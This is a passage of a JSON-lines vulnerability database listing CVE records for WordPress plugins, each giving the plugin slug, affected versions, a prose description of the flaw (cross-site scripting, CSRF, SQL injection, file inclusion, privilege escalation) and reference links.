ource=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6740","slug":"contact-form-cfdb7","versionImpact":"1.3.1","description":"The Contact Form 7 Database Addon plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018tmpD\u2019 parameter in all versions up to, and including, 1.3.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-cfdb7\\\/tags\\\/1.3.1\\\/contact-form-cfdb-7.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-cfdb7\\\/tags\\\/1.3.1\\\/contact-form-cfdb-7.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3320134\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3320134\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/contact-form-cfdb7\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/contact-form-cfdb7\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/014803c8-3319-48ad-98c7-d1f372d37ff2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/014803c8-3319-48ad-98c7-d1f372d37ff2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4471","slug":"yet-another-related-posts-plugin","versionImpact":"5.30.1","description":"The YARPP WordPress plugin through 5.30.1 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c6cf792b-054c-4d77-bcae-3b700f42130b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c6cf792b-054c-4d77-bcae-3b700f42130b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1927","slug":"wp-fastest-cache","versionImpact":"1.1.2","description":"The WP Fastest Cache plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.2. This is due to missing or incorrect nonce validation on the deleteCssAndJsCacheToolbar function. This makes it possible for unauthenticated attackers to perform cache deletion via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d3858f5-3f13-400c-acf4-eb3dc3a43308?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d3858f5-3f13-400c-acf4-eb3dc3a43308?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3132","slug":"mainwp-child","versionImpact":"4.4.1.1","description":"The MainWP Child plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 4.4.1.1 due to insufficient controls on the storage of back-up files. This makes it possible for unauthenticated attackers to extract sensitive data including the entire installations database if a backup occurs and the deletion of the back-up files fail.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2923512%40mainwp-child&new=2923512%40mainwp-child&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2923512%40mainwp-child&new=2923512%40mainwp-child&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a1fadba1-674f-4f3d-997f-d29d3a887414?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a1fadba1-674f-4f3d-997f-d29d3a887414?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5815","slug":"blog-designer-pack","versionImpact":"3.4.1","description":"The News & Blog Designer Pack \u2013 WordPress Blog Plugin \u2014 (Blog Post Grid, Blog Post Slider, Blog Post Carousel, Blog Post Ticker, Blog Post Masonry) plugin for WordPress is vulnerable to Remote Code Execution via Local File Inclusion in all versions up to, and including, 3.4.1 via the bdp_get_more_post function hooked via a nopriv AJAX. This is due to function utilizing an unsafe extract() method to extract values from the POST variable and passing that input to the include() function. This makes it possible for unauthenticated attackers to include arbitrary PHP files and achieve remote code execution. On vulnerable Docker configurations it may be possible for an attacker to create a PHP file and then subsequently include it to achieve RCE.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f2bdf11-401a-48af-b1dc-aeeb40b9a384?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f2bdf11-401a-48af-b1dc-aeeb40b9a384?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/blog-designer-pack\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/blog-designer-pack\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2984052%40blog-designer-pack&new=2984052%40blog-designer-pack&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2984052%40blog-designer-pack&new=2984052%40blog-designer-pack&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.leavesongs.com\\\/PENETRATION\\\/docker-php-include-getshell.html#0x06-pearcmdphp\",\"name\":\"https:\\\/\\\/www.leavesongs.com\\\/PENETRATION\\\/docker-php-include-getshell.html#0x06-pearcmdphp\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0506","slug":"elementor","versionImpact":"3.18.3","description":"The Elementor Website Builder \u2013 More than Just a Page Builder plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the $instance[alt] parameter in the get_image_alt function in all versions up to, and including, 3.18.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor access or higher to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4473d3f6-e324-40f5-b92b-167f76b17332?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4473d3f6-e324-40f5-b92b-167f76b17332?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementor\\\/tags\\\/3.18.3\\\/includes\\\/controls\\\/groups\\\/image-size.php#L119\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementor\\\/tags\\\/3.18.3\\\/includes\\\/controls\\\/groups\\\/image-size.php#L119\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementor\\\/tags\\\/3.18.3\\\/includes\\\/controls\\\/media.php#L381\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementor\\\/tags\\\/3.18.3\\\/includes\\\/controls\\\/media.php#L381\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3024999\\\/elementor\\\/trunk\\\/includes\\\/controls\\\/groups\\\/image-size.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3024999\\\/elementor\\\/trunk\\\/includes\\\/controls\\\/groups\\\/image-size.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2304","slug":"animated-headline","versionImpact":"4.0","description":"The Animated Headline plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'animated-headline' shortcode in all versions up to, and including, 4.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6f589b5d-9cdb-4521-bc60-c8f19d0ef982?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6f589b5d-9cdb-4521-bc60-c8f19d0ef982?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/animated-headline\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/animated-headline\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5570","slug":"simple-photoswipe","versionImpact":"0.1","description":"The Simple Photoswipe WordPress plugin through 0.1 does not have authorisation check when updating its settings, which could allow any authenticated users, such as subscriber to update them","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/49b3a8cb-f606-4cf7-80ec-bfdafd74e848\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/49b3a8cb-f606-4cf7-80ec-bfdafd74e848\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2337","slug":"easy-testimonials","versionImpact":"3.9.5","description":"The Easy Testimonials plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'testimonials_grid ' shortcode in all versions up to, and including, 3.9.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2c470cb0-5cbc-4ae1-b75a-384668d07215?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2c470cb0-5cbc-4ae1-b75a-384668d07215?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-testimonials\\\/trunk\\\/easy-testimonials.php#L1039\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-testimonials\\\/trunk\\\/easy-testimonials.php#L1039\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9457","slug":"cssjockey-add-ons","versionImpact":"3.0.7","description":"The WP Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 3.0.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/041c21fb-f2f0-45cb-b3ae-20f3ae22c947?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/041c21fb-f2f0-45cb-b3ae-20f3ae22c947?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cssjockey-add-ons\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cssjockey-add-ons\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-47429","slug":"8-degree-coming-soon-page","versionImpact":"2.2.0","description":"Missing Authorization vulnerability in 8Degree Themes Coming Soon Landing Page and Maintenance Mode WordPress Plugin allows Retrieve Embedded Sensitive Data.This issue affects Coming Soon Landing Page and Maintenance Mode WordPress Plugin: from n\/a through 2.2.0.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/8-degree-coming-soon-page\\\/vulnerability\\\/wordpress-coming-soon-landing-page-and-maintenance-mode-wordpress-plugin-plugin-2-2-0-broken-access-control?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/8-degree-coming-soon-page\\\/vulnerability\\\/wordpress-coming-soon-landing-page-and-maintenance-mode-wordpress-plugin-plugin-2-2-0-broken-access-control?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12592","slug":"sellsy","versionImpact":"2.3.3","description":"The Sellsy plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'testSellsy' shortcode in all versions up to, and including, 2.3.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sellsy\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sellsy\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9fd3610c-cce4-420c-85c1-0b71679df650?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9fd3610c-cce4-420c-85c1-0b71679df650?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11132","slug":"eventer","versionImpact":"3.9.9.4","description":"The Eventer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcodes in versions up to, and including, 3.9.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/eventer-wordpress-event-manager-plugin\\\/20972534\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/eventer-wordpress-event-manager-plugin\\\/20972534\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2b747d61-4528-485e-b746-6dddc64485b5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2b747d61-4528-485e-b746-6dddc64485b5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12339","slug":"wedesin-html-sitemap","versionImpact":"3.1.1","description":"The Digihood HTML Sitemap plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018channel' parameter in all versions up to, and including, 3.1.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wedesin-html-sitemap\\\/trunk\\\/plugin-framework\\\/Functions\\\/Logging\\\/html.php#L36\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wedesin-html-sitemap\\\/trunk\\\/plugin-framework\\\/Functions\\\/Logging\\\/html.php#L36\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wedesin-html-sitemap\\\/trunk\\\/plugin-framework\\\/Functions\\\/Logging\\\/html.php#L64\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wedesin-html-sitemap\\\/trunk\\\/plugin-framework\\\/Functions\\\/Logging\\\/html.php#L64\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/862f8743-5c8c-45ee-a2eb-9ae12c2800ca?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/862f8743-5c8c-45ee-a2eb-9ae12c2800ca?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3607","slug":"frontend-login-and-registration-blocks","versionImpact":"1.0.7","description":"The Frontend Login and Registration Blocks plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.0.7. This is due to the plugin not properly validating a user's identity prior to updating a password. This makes it possible for authenticated attackers, with Subscriber-level access and above, to change arbitrary user's passwords, including administrators, and leverage that to gain access to their account.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frontend-login-and-registration-blocks\\\/trunk\\\/inc\\\/class-flr-blocks-lost-password.php#L115\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frontend-login-and-registration-blocks\\\/trunk\\\/inc\\\/class-flr-blocks-lost-password.php#L115\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b06ce1e4-5cfb-415d-ad09-db194d6b4354?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b06ce1e4-5cfb-415d-ad09-db194d6b4354?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4205","slug":"popup-maker","versionImpact":"1.20.4","description":"The Popup Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018popupID' parameter in all versions up to, and including, 1.20.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/popup-maker\\\/tags\\\/1.20.4\\\/assets\\\/js\\\/site.js#L869\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/popup-maker\\\/tags\\\/1.20.4\\\/assets\\\/js\\\/site.js#L869\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3303770\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3303770\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/popup-maker\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/popup-maker\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/58fe6f67-1139-4d3e-864d-3966cede5077?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/58fe6f67-1139-4d3e-864d-3966cede5077?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7036","slug":"cleverreach-wp","versionImpact":"1.5.20","description":"The CleverReach\u00ae WP plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018title\u2019 parameter in all versions up to, and including, 1.5.20 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cleverreach-wp\\\/tags\\\/1.5.20\\\/Controllers\\\/class-clever-reach-article-search-controller.php#L159\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cleverreach-wp\\\/tags\\\/1.5.20\\\/Controllers\\\/class-clever-reach-article-search-controller.php#L159\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cleverreach-wp\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cleverreach-wp\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/764041ca-65cd-498c-97e5-a33d7b54a2b9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/764041ca-65cd-498c-97e5-a33d7b54a2b9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4458","slug":"amr-shortcode-any-widget","versionImpact":"4.0","description":"The amr shortcode any widget WordPress plugin through 4.0 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c85ceab3-7e79-402d-ad48-a028f1ee070c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c85ceab3-7e79-402d-ad48-a028f1ee070c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1926","slug":"wp-fastest-cache","versionImpact":"1.1.2","description":"The WP Fastest Cache plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.2. This is due to missing or incorrect nonce validation on the deleteCacheToolbar function. This makes it possible for unauthenticated attackers to perform cache deletion via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b793a4cb-3130-428e-9b61-8ce29fcdaf70?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b793a4cb-3130-428e-9b61-8ce29fcdaf70?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3371","slug":"embedpress","versionImpact":"3.7.3","description":"The User Registration plugin for WordPress is vulnerable to Sensitive Information Exposure due to hardcoded encryption key on the 'lock_content_form_handler' and 'display_password_form' function in versions up to, and including, 3.7.3. This makes it possible for unauthenticated attackers to decrypt and view the password protected content.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedpress\\\/tags\\\/3.7.3\\\/EmbedPress\\\/Includes\\\/Classes\\\/Helper.php#L231\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedpress\\\/tags\\\/3.7.3\\\/EmbedPress\\\/Includes\\\/Classes\\\/Helper.php#L231\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c1033b4d-82a0-4484-aebf-f35d6a2a9a13?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c1033b4d-82a0-4484-aebf-f35d6a2a9a13?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2930523\\\/embedpress#file28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2930523\\\/embedpress#file28\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2930523\\\/embedpress#file10\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2930523\\\/embedpress#file10\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedpress\\\/tags\\\/3.7.3\\\/EmbedPress\\\/Includes\\\/Classes\\\/Helper.php#L278\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedpress\\\/tags\\\/3.7.3\\\/EmbedPress\\\/Includes\\\/Classes\\\/Helper.php#L278\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedpress\\\/tags\\\/3.7.3\\\/Gutenberg\\\/block-backend\\\/block-embedpress.php#L30\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedpress\\\/tags\\\/3.7.3\\\/Gutenberg\\\/block-backend\\\/block-embedpress.php#L30\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5742","slug":"easyrotator-for-wordpress","versionImpact":"1.0.14","description":"The EasyRotator for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'easyrotator' shortcode in all versions up to, and including, 1.0.14 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3041e28e-d965-4672-ab10-8b1f3d874f19?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3041e28e-d965-4672-ab10-8b1f3d874f19?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easyrotator-for-wordpress\\\/tags\\\/1.0.14\\\/easyrotator.php#L1913\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easyrotator-for-wordpress\\\/tags\\\/1.0.14\\\/easyrotator.php#L1913\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0442","slug":"royal-elementor-addons","versionImpact":"1.3.87","description":"The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via element URL parameters in all versions up to, and including, 1.3.87 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor access or higher to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/256b4818-290b-4660-8e83-c18b068a8959?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/256b4818-290b-4660-8e83-c18b068a8959?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/royal-elementor-addons\\\/tags\\\/1.3.87&new_path=\\\/royal-elementor-addons\\\/tags\\\/1.3.88&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/royal-elementor-addons\\\/tags\\\/1.3.87&new_path=\\\/royal-elementor-addons\\\/tags\\\/1.3.88&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032004\\\/royal-elementor-addons\\\/tags\\\/1.3.88\\\/modules\\\/pricing-table\\\/widgets\\\/pricing-table.php?old=3026824&old_path=royal-elementor-addons%2Ftags%2F1.3.87%2Fmodules%2Fpricing-table%2Fwidgets%2Fpricing-table.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032004\\\/royal-elementor-addons\\\/tags\\\/1.3.88\\\/modules\\\/pricing-table\\\/widgets\\\/pricing-table.php?old=3026824&old_path=royal-elementor-addons%2Ftags%2F1.